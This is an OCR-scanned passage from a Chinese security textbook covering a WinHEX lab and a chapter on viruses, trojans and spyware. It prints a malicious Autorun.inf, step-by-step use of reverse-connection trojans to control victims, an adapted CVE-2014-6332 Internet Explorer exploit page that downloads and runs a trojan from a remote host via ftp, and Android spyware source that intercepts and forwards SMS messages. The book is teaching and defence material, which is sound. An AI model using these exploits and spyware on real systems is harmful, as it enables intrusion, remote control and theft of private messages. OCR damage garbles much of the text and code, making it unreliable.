与 WinHEX 相关 的 还 有 该 公司 的 产品 “X-Ways Forensics”, 该 软件 包含 WinHEX 
的 所 有 功能 , 且 具 有 更 强大 的 数据 分 析 、 取 证 能 力 , 感 兴趣 的 读者 可 自己 练习 。 

在 http://www. x-ways. net/winhex. zip 下 载 WinHEX。 

本 实验 在 虚拟 机 (VMware、Windows 2003 SP2) 中 安装 使 用 WinHEX 15. 6。 

实验 过 程 如 下 。 

CD 在 C 盘 根 目录 中 建立 X-ways 文件 来, 在 X-ways 文件 夹 中 建立 一 个 文本 文件 ， 
文件 名 为 winhex. txt, 内 容 为 “使 用 WinHEX 练习 ”。 

(2) 解压 软件 包 WinHEX 15. 6. zip ,运行 WinHEX. exe 文件 ,如 图 7. 33 所 示 ,一 定 
要 选择 Computer forensics interface. 否则 部 分 功能 不 能 使 用 。 单 击 OK 按钮 ,进入 


SEE 
» 


rs 
Aee 
E Fé 


7.33 WinHex 主 界面 
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WinHEX 主 界面 ,如 图 7. 34 所 示 。 

请 大 家 注意 ,这 里 除 WinHEX 软件 的 所 有 功能 以 外 ,还 包含 Case Data 区 域 ,用 来 进 
行 磁 盘 数 据 分 析 和 文件 恢复 。 

本 实验 中 主要 使 用 WinHEX 的 基本 工具 (Tools、 选 项 设置 (Options、 查 找 功 能 C 
Search) 和 数据 分 析 功 能 (Case Data) ) 。 

(3) 在 图 7. 33 中 ,依次 选择 Options-Edit Mode, 出 现 Select Mode 对 话 框 ,如 图 7. 35 
所 示 ,选择 Default Edit Mode ( —editable) , 单 击 OK 按钮 。 


图 7.34 选择 Computer forensics interface 图 7.35 选择 Select Mode 对 话 框 


(4) 在 图 7.36 中 ,依次 选择 File-Open, 打 开 文件 winhex. txt. f£ PCS 3 一 8 六 个 字 
节 , 单 击 “ 保 存 ” 按 钮 ,出 现 如 图 7. 37 所 示 对 话 框 , 单 击 Yes 按钮 确认 保存 。 用 记事 本 打 
JF winhex. txt 文件 ,内 容 为 “练习 WinHEX 练习 ”。 


图 7.36 WinHex 主 界面 


图 7.37 确认 保存 


(5) 加 密 文 件 winhex. txt。 在 图 7. 36 中 ,依次 选择 Edit-Modify Data ,出 现 Modify 
Data 对 话 框 , 如 图 7. 38 所 示 ,选择 XOR ,输入 “22”, 单 击 OK 按钮 ,对 文件 内 容 加 密 变换 。 
加 密 前 文件 内 容 是 “练习 Winhex 2& 2] " Ji s Ji 3C fF VI A E "i SEES (0 KLIGZ RE X 
VEU. feu ETT I] FEL HR FE BIET o 
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图 7.38 Modify Data 对 话 框 


WinHEX 的 其 他 功能 请 读者 自己 体会 。 


7.9 ” 课 后 体会 与 练习 


1. 填空 题 

(1) Web 是 的 简称 , 即 万 维 网 。Web 服务 是 指 采用 架构 ,通过 
HTTP 协议 提供 服务 的 统称 ,这 种 结构 也 称 为 架构 。 

(2) 是 一 种 用 来 制作 网 页 的 标记 语言 , 它 不 需要 编译 ,可 以 直接 由 浏览 器 执 
行 ,属于 浏览 器 解释 型 语言 。 

(3) JavaScript 是 一 种 的 描述 语言 ,可 以 用 来 开发 Internet 客户 端的 应 用 
程序 。 

(4) 实时 监控 Web 站 点 , 当 Web 站 点 上 的 文件 受到 破坏 时 ,能 迅速 恢复 被 
破坏 的 文件 ,并 及 时 提交 报告 给 系统 管理 员 , 从 而 保护 Web 站 点 的 数据 安全 。 

(5) 是 可 以 管理 Web, 修 改 主页 内 容 等 的 权限 ,如 果 要 修改 别人 的 主页 ,一 
般 都 需要 这 个 权限 ,上 传 漏洞 要 得 到 的 也 是 这 个 权限 。 

(6) 借助 于 互联 网 数字 通信 技术 向 客户 提供 金融 信息 发 布 和 金融 交易 服 
务 , 是 传统 银行 业务 在 互联 网 上 的 延伸 ,是 一 种 虚拟 银行 。 

CO 开展 网 上 银行 有 两 大 保障 : 和 | 

2. 思考 与 简 答题 


(1) 简 述 垃圾 邮件 的 危害 性 以 及 如 何 避 免 垃 圾 邮件 ? 
(2) 什么 是 网 络 钓鱼 ? 

3. 上 机 题 

CD 下 浏览 器 防范 网 络 钓鱼 的 设置 。 

(2) QQ 的 安全 设置 。 

(3) WinHEX 的 使 用 。 
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亏本 章 课 前 准备 

学 习 本 章 内 容 之 前 ,需要 准备 如 下 知识 : 

。 了 解 什么 是 病毒 .木马 和 间谍 软件 。 

x 本章 教 学 目标 

本 章 的 教学 目标 是 : 

。 理解 病毒 ,木马 和 间谍 软件 的 工作 方式 ; 
。 掌握 恶意 软件 的 清除 。 

名 本 章 教学 要 点 

本 章 的 教学 要 点 包括 : 

。 病毒 .木马 和 间谍 软件 的 传播 和 防御 。 
x 本 章 教学 建议 

。 尽量 不 要 在 真 机 上 测试 ,最 好 能 用 虚拟 机 。 


8.1 病毒 技术 


计算 机 病毒 (Computer Virus) 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 
者 毁坏 数据 影响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 它 是 一 种 
恶意 软件 程序 ,运行 的 时 候 , 通 过 把 病毒 复制 到 其 他 计算 机 程序 、 数 据 文件 或 引导 扇 区 等 
方式 来 感染 目标 机 器 ,往往 会 执行 一 些 有 害 的 操作 ,比如 访问 私人 信息 、 损 坏 数 据 、 恶 作 
剧 、 监 控 键盘 以 及 恶意 敲诈 等 。 

病毒 编写 者 一 般 利 用 社会 工程 手段 和 安全 漏洞 来 编制 病毒 感染 目标 主机 ,未 经 用 户 
同意 的 情况 下 安装 软件 。 创 建 病毒 的 动机 主要 包括 赚钱 、 恶 作 剧 以 及 渗透 破坏 等 。 

计算 机 病毒 目前 每 年 造成 数 百 亿 元 的 经 济 损失 ,这 些 经 济 损失 主要 是 由 于 病毒 导致 
系统 故障 .计算 机 资源 浪费 .破坏 数 据 和 增加 维护 成 本 等 造成 的 。 目 前 市 场 上 有 很 多 杀毒 
软件 有 效 地 阻止 了 大 部 分 病毒 ,但 没有 一 种 软件 能 杀 所 有 的 病毒 ,所 以 要 不 断 更 新 病毒 
库 、 操 作 系统 以 及 各 种 软件 。 

病毒 的 分 类 有 很 多 种 ,其 中 比较 有 名 的 有 蠕虫 病毒 ,蠕虫 病毒 指 可 以 通过 网 络 等 途径 
将 自身 的 全 部 代码 或 部 分 代码 通过 网 络 复制 \ 传 播 给 其 他 的 网 络 节点 的 程序 。 它 不 同 于 
计算 机 病毒 ,不 需要 文件 宿主 。 蠕 虫 由 于 通过 网 络 大 量 复制 传播 ,可 造成 网 络 阻塞 ,甚至 
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AER. 2006 4E 10 H 16 日 25 岁 的 中 国 湖北 武汉 青年 李 俊 编写 了 一 个 很 有 影响 力 的 蠕虫 
病毒 , 叫 * 能 猫 烧香 ”, 拥 有 感染 传播 功能 ,次 年 1 月 初 肆虐 网 络 , 用 户 中 招 后 ,最 典型 的 钙 
状 就 是 所 有 . exe 可 执行 文件 全 部 被 改 成 熊猫 举 着 三 根 香 的 模样 。 它 主要 通过 网 络 默 认 
共享 等 途径 感染 目标 机 器 ,对 计算 机 程序 、 系 统 破坏 严重 。2007 年 9 月 24 日 , “熊猫 烧 
香 ” 案 一 审 宣判 ,主犯 李 俊 被 判刑 4 4E, 2013 4E 6 月 病毒 制造 者 张 顺 和 李 俊 伙同 他 人 开 
设 网 络 赌场 案 , 再 次 获 刑 。 


8.1.1 实践 案例 8-1: Autorun. inf 病毒 源码 分 析 与 传播 


其 实 Autorun. inf 本 身 并 不 是 病毒 ,只 不 过 大 部 分 中 毒 U 盘 中 都 会 有 个 文件 ,包括 很 
多 没有 中 毒 的 U 盘 里 面 也 有 这 个 文件 。 当 然 , 后 者 往往 是 杀毒 工具 放 进 去 的 ,起 到 免疫 
的 效果 。 

Autorun, inf 是 一 个 普通 的 文本 文件 ,主要 存在 于 各 驱动 器 的 根 目 录 下 ,作用 是 双击 
驱动 器 会 自动 执行 某 个 程序 。 该 文件 刚 开 始 是 用 在 光盘 上 的 ,后 来 被 各 种 病毒 用 在 U f 
上 , 诱 使 用 户 双击 U 盘 驱 动 器 ,感染 和 传播 病毒 。 

下 面 编写 一 个 简易 版 的 Autorun. inf 病毒 ,通过 Autorun. inf 来 启动 一 个 bingdu. 
vbs, 这 个 vbs 病毒 可 以 去 下 载 一 个 真正 的 病毒 ,或 者 把 vbs 文件 替换 成 真正 的 病毒 也 
可 以 。 

Autorun. info 内 容 如 下 。 


[autorun] 

apen= bingdu.vbs 

shellVopen- Tf (80) 
shellVopenNCanmand- bi ge. vbs 
shellVopenNDefault- 1 
shell\explore- 资 源 管理 器 (X) 
shell\explore\Camrand- bingdi.vbs. 


微软 在 Windows 7 后 就 默认 禁用 Autorun 了 ,这 样 通过 U 盘 传 播 的 病毒 大 大 减少 ， 
所 以 系统 升级 是 很 有 必要 的 。 


8.1.2 实践 案例 8-2: 病毒 查 杀 与 防范 


世面 上 流行 很 多 杀毒 软件 ,例如 360、 金 山 毒霸 、 瑞 星 和 卡巴 斯 基 等 ,都 有 很 好 的 查 杀 
效果 ,每 种 杀毒 软件 的 功能 大 同 小 异 , 下 面 以 金山 毒霸 为 例 来 说 明 杀 毒 软件 的 安装 和 
使 用 。 

去 官网 下 载 最 新 安装 包 http://www. ijinshan. com/ ,如 图 8. 1 所 示 。 

下 载 成 功 后 ,双击 安装 ,如 图 8. 2 所 示 。 

单 击 “开始 安装 ”, 速 度 很 快 , 安 装 完成 后 出 现 如 图 8. 3 所 示 的 界面 。 

杀毒 软件 最 主要 的 功能 就 是 一 键 云 查 杀 或 者 电脑 杀毒 .点击 之 后 软件 会 对 机 器 进行 
全 面 检查 ,如 图 8.4 所 示 。 
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EWR NES 
Sis. ER- 更 安全 


安 半 所 大 小 : 16.1IM ME R7 
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图 8.1 下 载 金山 毒霸 安装 包 图 8.2 安装 金山 毒霸 
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B oer [ord 
PA mamie LES uim [d 软件 管理 


98m 病毒、 木马 和 间谍 软件 


扫描 完成 出 现 如 图 8. 5 所 示 的 报告 。 


© 系统 安全 231488 


加 CAsers\winNDesktop\dns.exe 


图 8.5 查 杀 结 果 


单 击 “ 立 即 处 理 ” 扫 描 出 的 病毒 文件 即 可 杀 掉 。 
病毒 的 防范 除了 要 安装 杀毒 软件 之 外 ,还 有 保持 操作 系统 ,杀毒 软件 以 及 其 他 软件 保 
持 最 新 的 安全 更 新 ,不 要 打开 来 路 不 明 的 软件 。 


8.2 木马 技术 


特洛伊 木马 ,在 计算 机 领域 中 指 的 是 一 种 后 门 程序 ,用 来 盗 取 他 人 机 器 上 各 种 信息 ， 
甚至 是 远程 控制 对 方 的 计算 机 。 木 马 通常 通过 各 种 手段 传播 或 者 诱骗 目标 用 户 执行 该 程 
序 , 然 后 里 应 外 合 , 给 用 户 带 来 极 大 的 破坏 。 与 病毒 相似 ,木马 程序 有 很 强 的 隐秘 性 , 随 操 
作 系 统 启动 而 启动 。 

最 近 出 现 了 一 种 “比特 币 敲诈 木马 ”, 该 木马 一 般 通 过 邮件 发 送 , 后 级 名 为 Windows 
屏保 的 后 级 scr, 是 可 以 执行 的 ,一 般 人 不 会 注意 ,很 容易 中 招 。 一 旦 中 招 ,机 子 上 很 多 重 
要 文件 将 会 被 加 密 ,如 果 想 恢复 ,必须 向 作者 支付 比特 币 才能 找 回 文件 ,即使 杀 掉 木 马 也 
不 能 恢复 文件 。 作 者 利用 比特 币 匿 名 交易 的 特点 ,保证 自己 的 安全 。 


8.2.1 实践 案例 8-3: 反 向 连接 木马 的 传播 


一 般 木马 进入 受害 者 机 器 后 ,会 开启 某 个 端口 来 监听 来 自控 制 端的 连接 ,控制 端 连接 
上 以 后 就 可 以 操纵 受害 者 机 器 。 而 反 向 木马 则 是 自己 主动 去 连接 控制 端 ,然后 控制 端 看 
到 这 个 卧底 之 后 ,也 可 以 进行 各 种 控制 。 反 向 连接 最 大 的 好 处 是 可 以 培养 大 批 内 网 的 “ 肉 
鸡 ”( 即 被 控制 的 计算 机 ) 供 自己 使 用 。 下 面 来 分 析 一 下 灰 镶 子 这 款 经 典 的 反 向 连接 木马 
工具 是 如 何 传 播 以 及 控制 的 。 
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安装 灰 钥 子 软件 并 打开 ,如 图 8. 6 所 示 。 


自动 上 线 主机 
符合 条 件 主机 


图 8.6 KTHE 
首先 单 击 “ 配 置 服务 程序 ,出现 界面 如 图 8.7 所 示 。 


mem ms 条 地 各 或 加 证 IP: | 
[172. 18. 33.147 说 明 ] 
risp. B 

: [BEEN 


说 明 
清除 


保存 路 径 区 2008Vhuigezi\Server. exe 回 | [生成 服务 回 ] 


图 8.7 “服务 器 配置 "界面 


填 入 自己 的 IP, 然 后 单 击 “ 生 成 服务 器 ”, 将 会 在 程序 目录 下 生成 一 个 吊 server. exe 
的 文件 ,下 面 就 是 想 尽 办 法 让 别人 运行 这 个 server. exe 文件 。 当 别人 运行 server. exe 后 ， 
什么 反应 都 没有 ,但 实际 上 我 们 在 灰 铝 子 的 主 界面 将 会 看 到 如 图 8. 8 所 示 的 效果 。 

这 时 IP 为 172. 18. 33. 150 的 机 器 中 的 木马 成 功 反 向 连接 上 ,可 以 选择 该 机 器 ,然后 
单 击 捕获 屏幕 ,将 会 出 现 如 图 8. 9 所 示 的 界面 。 

在 该 界面 中 ,可 以 对 目标 机 器 进行 各 种 操作 。 该 木马 有 很 多 其 他 功能 ,在 此 就 不 一 一 
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[2] Je 561-2008 www. whxtpc- cn 专 版 172. 18. 33. 147 sre T ES] 
文件 人 E) RAO IAW 8B | 
Eum. LÀ ARE: 
| 自动 上 线 | 捕获 屏幕 | 视频 语音 Telnet ”配置 服务 程序 “最 小 化 | 退出 
Apae [2183315048 493 9 电脑 名 称 {REN-8A107d 连接 密码 | CRG) 

动 上 线 主机 了 | BERISIERÁR ~ 搜索 | 
EXESLCLHIERN M 
“mm ESIx t E.) [| 
d ES | 大 小 ( 字 节 ) | 修改 日 期 [| 
s 
à 一 D 
连接 成 功 :172. 18. 3: a C288. NET 成 功 
更 动 否 列 表 读 取 完毕 . 现在 可 以 对 主机 进行 运程 控制 了 ，8:22:08 


图 8.8 成 功 对 主机 远程 控制 


「 远程 屏幕 [1T721853450 eee 
beaj E) pe pis] u+ x 


fy 


Ey 
indows Server 2003 R2 


Enterprise x64 Editior 


图 8.9 对 远程 主机 控制 


8.2.2 实践 案例 8-4: 网 页 病毒 与 网 页 挂 马 


网 页 病毒 ,主要 是 利用 软件 或 操作 系统 的 安全 漏洞 或 者 安全 设置 的 疏忽 ,通过 执行 嵌 
入 在 网 页 HTML 内 JavaScript 脚本 语言 程序 或 ActiveX 控件 程序 ,以 对 系统 进行 高 权限 
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的 破坏 等 操作 。 

网 页 挂 马 ,主要 是 利用 软件 或 操作 系统 的 安全 漏洞 或 者 安全 设置 的 疏忽 ,通过 多 种 手 
段 把 木马 藏 在 网 页 中 ,并 使 没有 安全 措施 的 用 户 下 载 和 执行 木马 ,以 达到 控制 用 户 机 器 的 
目的 。 

一 般 来 说 ,浏览 器 本 身 是 会 实现 以 下 安全 机 制 , 使 得 正常 情况 下 ,网 页 的 脚本 不 具备 
访问 系统 高 级 功能 的 权限 ,但 可 能 浏览 器 设置 的 安全 性 较 低 ,这 时 就 很 容易 中 招 。 当 然 漏 
洞 的 危害 更 大 ,因为 可 能 会 直接 绕 过 安全 机 制 ,可 以 悄 无 声息 地 产生 危害 。 

2014 年 爆 出 了 IE 漏洞 CVE-2014-6332, 这 是 一 个 潜藏 了 18 年 的 TE 远程 代码 执行 
漏洞 CCVE-2014-6332) ,缺陷 出 现在 VBScript 的 代码 中 , 自 Windows 95 首次 发 布 以 来 就 
一 直 存 在 , 连 最 新 的 Dell 也 未 能 幸免 ,64 位 版 本 的 浏览 器 没有 此 缺陷 。 该 漏洞 使 
VBScript 溢出 而 跳 过 执行 检查 ,可 以 在 用 户 不 知情 的 情况 下 执行 用 户 电脑 上 任意 可 执行 
程序 ,网 上 也 有 打开 记事 本 和 计算 器 的 例子 。 本 文 对 此 略 加 修改 ,实现 了 一 个 可 以 远程 下 
载 木马 并 执行 的 网 页 , 仅 供 研 究 使 用 (代码 来 自 sinaapp. com) 。 


< 1- - saved fram url= (0037)http://execute.sinaapp.om/css/ie.htm - -> 


«BODY» 

< SCRIPT language- VBScript^ 

dim shell 

function rurmurea() 

On Error Resume Next 

set shell- createdbject ("shell .Application") 

"FAR ES 09 38 4 JC 88 TK E TR 5-38 

shell.ShellExecute "and.exe", "/c echo get. server.exe | ftp -A 172.18.33.122" 
setTimeout "rurmma", 5000 

end function 


< SCRIPT language- VBScript^ 


BEBE 
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if (instr (info, "Win64")» 0) then 
exit function 
edif 


if (instr (info, "MSIE")» 0) then 
intVersion- CInt (Mid(info, InStr (info, "MSIE")+5, 2)) 
else 
exit function 
endif 


win9x- 0 


BeginInit () 
If Create ()- True Then 
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myarray- chrw (01) &chrw (2176) &chrw (01) &chrw (00) &chrw (00) &chrw (00) &chrw (00) &chrw (00) 


myarray- myarray&chrw (00) &chrw (32767) &chrw (00) &chrw (0) 


if (intVersion« 4)then 
document .write ("< br» IE") 
document .write (intVersion) 
runshelloode () 

else 

setnotsafemode () 
end if 
end if 
end function 


function BeginInit () 
Fandamize () 
redim aa (5) 
redim ab (5) 
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a0=1317* md(6) 
a3= + 3* md(5) 
end function 


function Create () 
On Error Resume Next. 
dimi 
Create- False 
For i- 0 To 400 
If Over ()- True Then 
'  doament.write(i) 
Create- True 
Exit For 


i-null 
redim Preserve aa (a2) 


ab(0)=0 
aa(al)=i 
ab(0)= 6.36598737437801E- 314 


aa (al 2)- myarray 
ab (2) 1.74088534731324E- 310 
mydata- aa (al) 
redim Preserve aa (a0) 

end function 


function setnotsafemode () 
On Error Resume Next 
i-mycata() 
i= readremo (i+ 8) 
i= reaciremo (i+ 16) 
j= reaciremo (i+ gh134) 
for k-0 to &h60 step 4 


第 8 章 。 病毒、 木马 和 间谍 软件 


j= readmemp (i+ &h120 k) 
if(j=14)then 
j=0 
redim Preserve aa (a2) 
aa (alt 2) (i+ &hllct k)- ab(4) 
redim Preserve aa (a0) 


0 


ab(2)= 1.69759663316747E- 313 
rumaa () 


end function 


function Over () 
On Error Resume Next 
dim tyrel, type2, type3 
Over- False 
a0- a0 a3 
al-a0t2 
a2= a0+ &h8000000 


redim Preserve aa (a0) 
redim  ab(a0) 


redim Preserve aa (a2) 


typel=1 
ab(0)= 1.123456789012345678901234567890 
aa(a0)=10 


If (IsObject (aa al- 1))=False)Then 
if(intVersion« 4)then 

mem- cint (a0 1) * 16 

j- vartyre (aa (al- 1)) 

if((G-mem* 4)or (j * B-mem* 8)) then 

if(vartype (aa (al- 1))< » 0) Then 
If (1sCbject (aa (al) )= False) Then 
typel- VarType (aa (a1) ) 

eniif 
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mif 
else 
if (vartype (aa (al- 1))« » 0) Then 
1f(IsCbject (aa (a1) )- False) Then 
typel- VarType (aa (al) ) 
end 证 
endif 
endif 
end 证 


If (typel- sh2f66)Then 
Over- True 

End If 

If (typel- &hBOAD) Then 
Over- True 
win9x- 1 

End If 


redim Preserve aa (a0) 
end function 
function ReadMemo (add) 
On Error Resume Next 
redim Preserve aa (a2) 
ab(0)=0 
aa (al)= adh 4 
ab(0)= 1.69759663316747E- 313 
ReadMemo= lenb (aa (a1) ) 


ab(0)- 0 


redim Preserve aa(a0) 
end function 


</SCRIPT> 
< /BODY» < /HIMI- 
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8.2.3 实践 案例 8-5: 其 他 典型 木马 传播 


其 他 典型 的 木马 有 很 多 ,本 节 主 要 介绍 冰河 木马 的 传播 及 控制 方式 。 和 所 有 木马 一 
样 ,“ 冰 河 ” 也 有 服务 端 和 客户 端 ,第 一 步 当然 是 想方设法 把 服务 端 给 别人 运行 ,然后 就 可 
以 去 控制 对 方 。 

CD 第 一 步 ,打开 冰河 客户 端 ,如 图 8. 10 所 示 。 


文件 旧 SAE BMO Mel 


fma ggeau4ocoR 


ELI [sky wane: [ 应 用 [8] 


图 8. 10 “冰河 " 主 界面 


(2) 第 二 步 ,生成 服务 端 ,如 图 8. 11 所 示 。 


iw EXGE |n 自我 保护 | N 邮件 通知 | 


安装 路 径 : [Gro T] He: Bam Er —————— 
jpeg Printers jane: f 

敏感 字符 : OS ER ER. ER EA, Passverd connect, account, login, logon 
提示 信息 : 


amsn: E I BSExxuxt o wOMUEER 


araxe: pomm | 关闭 


8. 11 “服务 器 配置 "对 话 框 


(3) 第 三 步 ,把 生成 的 服务 端 给 对 方 运行 ,这 一 步 大 家 就 各 显 神通 了 。 
(4) 第 四 步 ,在 冰河 客户 端 中 扫描 目标 机 器 ,其 实 如 果 知 道 对 方 IP 的 话 ,可 以 直接 添 
加 地 址 即 可 。 如 果 不 知道 对 方 IP ,知道 对 方 在 哪个 网 段 也 行 , 然 后 根据 这 个 网 段 来 进行 
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扫描 。 如 果 都 不 知道 , 那 就 只 能 盲 扫 。 扫 描 方法 如 图 8. 12 Hr. 


搜索 结果 : 

UK: 172.18.33.143 
ERR: 172. 18.33. 147 
ERR: 172. 18.33. 150 


8.12 扫描 目标 机 器 


(5) 第 五 步 ,如 图 8. 13 所 示 , 可 以 看 出 扫 到 一 个 IP, 关 闭 搜索 框 之 后 ,该 IP 会 自动 加 
到 左边 的 树 形 目 录 中 ,可 以 查看 这 台 机 子 的 C 盘 。 


ra 


eB mn emo mmi 一 一 
| = 
f m) UAE Gp EAA 
当前 连接 : mesio — 3] wn: Fe — sane: 应 用 [8] 
A NES |I aaisa | - x 3 
Ey ELT ZEE 


C3 Inetpub 
& CJ Proga Files 
8 C racrcum 
(GI System Volume 
& Cj mos 
2100 2014-9-29 21:59:44 
0 2014-9-3 13:17:06 
192 2014-9-3 13:13:00 
322730 2003-3-27 20:00:00 
08T_2014-9-28 inc 


图 8.13 得 到 目标 机 器 IP 

(6) 第 六 步 : 我 们 还 可 以 进一步 控制 对 方 的 屏幕 。 当 然 还 有 些 其 他 功能 ,可 以 自行 
摸索 。 

8.2.4 实践 案例 8-6: 木马 查 杀 与 防范 


下 面 以 360 安全 卫士 为 例 ,展示 木马 的 查 杀 与 防范 ,如 图 8. 14 所 示 为 木马 扫描 查 杀 ， 
除 此 之 外 ,用 户 还 可 以 进入 360 卫士 安全 防护 中 心 ,设置 木马 防护 策略 和 级 别 等 ,这 些 设 
置 比较 简单 ,在 此 不 再 缆 述 。 
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正在 扫 摘 :文件 和 系统 内 存 


CNWindowsvexplorerexe 


Q IE 王 进行 森 引 要 摘 - 共 10 项 usse meamans) 

ENS. MSS. P. VETE. € GER 

(9) (A) ( ) a ) 

M wa) 下、 ON ) 
e pow NEA Wad NS NS t 

Ez 
MES PARE sR 系统 启动 项 DRHE 系统 登录 和 服务 
EAA. Sans LLLI Sum 

文件 和 系统 内 存 RBR 系统 综合 KRBE 

mes: 回回 回 O 扫 苦 这 成 后 后 动 关机 ( Bae 


图 8. 14 木马 扫描 查 杀 


8.3 有 间谍 软件 


间谍 软件 (Spyware) 是 在 未 经 用 户 许可 的 情况 下 搜集 用 户 个 人 信息 的 计算 机 程序 。 
主要 有 以 下 几 种 类 型 : 系统 监视 器 、 特 洛 伊 木马 程序 、 广 告 软件 和 跟踪 Cookie。 大 部 分 
间谍 软件 主要 用 于 跟踪 和 存储 在 Web 上 的 互联 网 用 户 动作 和 弹出 广告 向 互联 网 用 户 服 
务 的 目的 。 

通用 的 木马 其 实 也 是 一 种 较 恶 意 的 间谍 程序 ,很 多 时 候 是 否 是 间谍 软件 主要 是 看 用 
户 愿 不 愿意 。 例 如 很 多 Android 程序 会 自 带 很 多 广告 ,但 是 你 可 以 不 装 , 所 以 不 能 叫 间谍 
软件 。 

目前 在 Android 等 移动 端的 间谍 软件 越 来 越 多 ,以 下 以 Android 为 例 简 要 描述 一 下 
如 何 窃取 用 户 的 短信 。 该 程序 的 功能 是 当 有 新 的 来 信 的 时 候 ,会 截获 ,并 且 转 发 给 目标 机 
器 。 核 心 源码 如 下 。 


public class SFeciver extends BroadcastReceiver { 


@ Override 
public void cnReceive (Context context, Intent intent) { 
//IODD Arto- generated method stb 
Iog.i ("enspy:", A fi frio T"); 
// 获 取 到 一 组 短信 的 cpjs 数 组 
Gbject[] bjs= (Cbject[])intent.getExtras () .get ("pdus") ; 
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for (Object cbj:cbjs) ( 
SusMessage mes- SmsMessage .createFramEdu ( (byte[])obj); 
String body- res .getMessageBody () ; 
String sender- mes.getoriginatingacdress () ; 
Log.i ("smspy:", "VÀ E :" body) ; 
Log. ("smspy:", " [ri A :"+ sender); 
// 获 取 系 统 的 SnsManager, 用 来 转发 短信 
SmsManager smmanager- SmsManager .getDefault () ; 
// 短 信 内 容 的 长 度 是 有 限 的 ,要 根据 短信 长 度 截 取 , 然 后 逐条 发 送 
List« String» all- smmanager.dividesMessage (body) ; 
Tterator« String» it- all.iterator(); 
while(it.hasNext ()) ( 


//10086 也 可 以 使 用 本 机 号 码 ,但 后 果 自 负 ,oCVY ^o 

// 当 然 你 也 可 以 对 发 信人 进行 过 滤 , 只 监听 指定 号 码 的 短信 ,实在 太 简单 ,学 生 
自己 去 实现 

// 逐 条 发 送 短信 

smmenager.serdistMessage ("10086", rull, it.next(), mll, mill); 


} 
Android Manifest 文件 配置 如 下 。 


public class SMReciver extends BroadcastReceiver { 


@ Override 
public void cnReceive (Context context, Intent intent) { 
//TOD Auto- generated method stub 
1og.i ("emspy:", H Ai fio T"); 
// 获 取 到 一 组 短信 的 cpjs 数 组 
Object[] dbjs- (bject[])intent.getExtras() .get ("pdus") ; 
for (Object d»j:d»js)t 
SmsMessage mes- SmsMessage.createFrarPdu ( (byte []1) dj) ; 
String body-mes.getMessageBody () ; 
String sender nes. getOriginatingAddress () ; 
Icg.i ("amspy:", "VA E :"+ body) ; 
Iog.i("anspy:w" 发 信人 :"+ sender); 
/获取 系统 的 SnsManager, 用 来 转发 短信 
SmsMenager smmanager- SmsManager .getDefault () ; 
// 短 信 内 容 的 长 度 是 有 限 的 ,要 根据 短信 长 度 截取 ,然后 逐条 发 送 
List« String» all- smmanager.divideMessage (body) ; 
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Iterator« String» it=all.iterator (); 
while(it.hasNext ()) { 


//10086 也 可 以 使 用 本 机 号 码 ,但 后 果 自 负 ,o(V ^o 

// 当 然 你 也 可 以 对 发 信人 进行 过 滤 , 只 监听 指定 号 码 的 短信 ,实在 太 简单 ,学 生 
自己 去 实现 

// 逐 条 发 送 短信 

smmeanager. sendllstMessage ("10086", mall, it.next(), mill, mill); 


} 


通过 模拟 器 调试 运行 效果 如 下 ,首先 调试 该 程序 ,然后 在 DDMS 视图 下 给 模拟 器 发 
个 短信 ,如 图 8. 15 所 示 , 单 击 send 按钮 。 


ee 
LECCE e ona ts 


ama 


Bg reise zt -p 
š gw 9 3o: 


com.android.music 
comandroid dialer 
comandroid.provide | 
com.android.mms 
com.android.calenda. 


roid deskcla “| 
mmi" ; ] 


LIE 


[Search for messages. Accepts Java regexes. Prefix with pid: app: ta 


8.15. DDMS 下 给 模拟 器 发 短信 


调试 器 进入 断 点 ,可 以 看 到 日 志 打 印 的 信息 ,如 图 8. 16 所 示 。 说 明 短信 截获 成 功 并 
准备 给 10086 转发 。 
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SnsMessage.createFronPdu((bytel]) obj): 
String body = mes.getMessageBody () ; 
String sender = mes.getOriginatingAddress(); 
Log.i(*smspy: ", "PIE: "+body) ; 

.i(vsmspy: ","ÆfB A :"+sender); 


Log 
7/ 获取 系 统 的 smsManager， 用 来 转发 短信 


SmaManager smmanager-SasManager.getDefault(); 
/7/ 短 信和 内 容 的 长 度 是 有 限 的 ， 要 根据 重信 长 度 鼓 取 ， Euge 
IteratorkString» itcall.iterator(); 
while(it.hasNext ()) ( 
//i0086 也 可 以 使 用 本 机 号 码 ， 但 后 果 自 负 ，ot~w^)o 
7/ 当然 你 也 可 以 对 发 信人 进行 过 渡 ， 只 监听 指定 号 码 的 短信 , 实在; 
HERRES 
smmanager.sendTextMessage ("10086", null, it.next(), null 
1 


C >] 


LIII = 


Saved Filters ^ [Search for messages. Accepts Java regexes. Prefix with p| A gn 
All messages 


| Tag Tet 
有 短信 末了 
内 容 :hahahahhaahahha 
受信 人 :10000 


图 8.16 断 点 调试 


8.4 课 后 体会 与 练习 


1. 病毒 木马 和 间谍 软件 间 的 区 别 有 哪 些 ? 
2. 什么 是 网 页 挂 马 ? 其 实施 的 原理 是 什么 ? 
3. 如 何 防 范 间谍 软件 的 植 和 信 ? 
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各 本章 课 前 准备 

学 习 本 章 内 容 之 前 ,需要 准备 如 下 知识 : 

。 了 解 系统 攻击 扫描 和 漏洞 利用 工具 的 使 用 。 
如 本 章 教学 目标 

本 章 的 教学 目标 是 : 

。 掌握 系统 攻击 扫描 和 漏洞 利用 工具 的 使 用 。 
本 章 教学 要 点 

本 章 的 教学 要 点 包括 : 

e Nmap Metasploit, 

亏本 章 教学 建议 

。 尽量 使 用 靶 机 来 完成 ; 

。 不 是 每 个 系统 下 都 会 有 很 好 可 利用 的 漏洞 。 


作为 一 个 信息 安全 从 业 人 员 ,如 果 不 了 解 和 掌握 一 些 黑客 的 攻击 技术 ,那儿 乎 是 无 法 
胜任 相应 的 工作 的 ,简单 地 说 ,就 是 如 果 想 战胜 对 手 就 必须 深刻 地 了 解 对 手 。 系 统 攻击 的 
范围 和 手段 很 广 ,本 章 主要 以 典型 操作 系统 为 例 ,来 讲述 系统 渗透 攻击 的 方法 。 系 统 渗透 
攻击 技术 博大 精深 ,下 面 分 别 以 Windows 和 Linux 平台 下 的 一 个 实例 来 讲解 。 无 论 是 何 
种 平台 ,系统 渗透 攻击 都 是 遵循 以 下 步骤 : 侦察. 扫描、 漏洞 利用 和 维持 访问 。 侦 察 阶 段 
是 搜集 信息 ,扫描 是 对 目标 进行 端口 ,漏洞 的 扫描 ,漏洞 利用 是 根据 扫描 到 的 漏洞 来 获得 
